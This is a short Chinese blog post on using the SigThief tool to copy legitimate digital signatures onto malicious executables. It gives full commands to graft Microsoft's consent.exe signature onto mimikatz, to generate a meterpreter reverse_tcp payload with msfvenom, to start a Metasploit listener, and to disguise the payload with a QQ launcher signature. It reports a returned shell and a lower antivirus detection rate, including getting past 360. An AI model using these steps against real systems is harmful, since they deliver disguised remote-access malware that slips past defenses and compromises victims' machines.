zoukankan      html  css  js  c++  java
  • 数字签名混淆

    Github

    https://github.com/secretsquirrel/SigThief

    Sigthief是劫持合法的数字签名并绕过Windows的哈希验证机制可以被红队用于将恶意二进制文件和PowerShell脚本与本机操作系统文件混合,以逃避检测并绕过设备防护。

    1.首先是Github上的实例 :

    从一个二进制签名,并将其添加到另一个二进制文件

    python sigthief.py -i c:WindowsSystem32consent.exe -t mimikatz.exe -o mimi.exe

    借用msfvenom的payload

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.5 LPORT=4445 -f exe > lonsheng.exe
    

      

    启动监听模块

    use exploit/multi/handler
    set LHOST 192.168.3.5
    set LPORT 4445
    

      

     cd 进数字签名混淆的文件然后

    python sigthief.py -i E:QQBinQQScLauncher.exe -t C:UsershackerDesktoplonsheng.exe -o jiu.exe
    

      

    然后运行jiu.exe可以看见返回了一个meterpreter

    然后扔到http://r.virscan.org查毒

    明显降低了查杀率而且还能过360

    我们看看jiu.exe和longsheng.exe的对比

  • 相关阅读:
    algorithm
    jstl
    jsp
    cookie
    变量和方法调用过程中会出现的参数传递
    http请求
    weblogic 的安全域问题
    web service
    行业充电
    客户端生成web service
  • 原文地址:https://www.cnblogs.com/haq5201314/p/8213906.html
Copyright © 2011-2022 走看看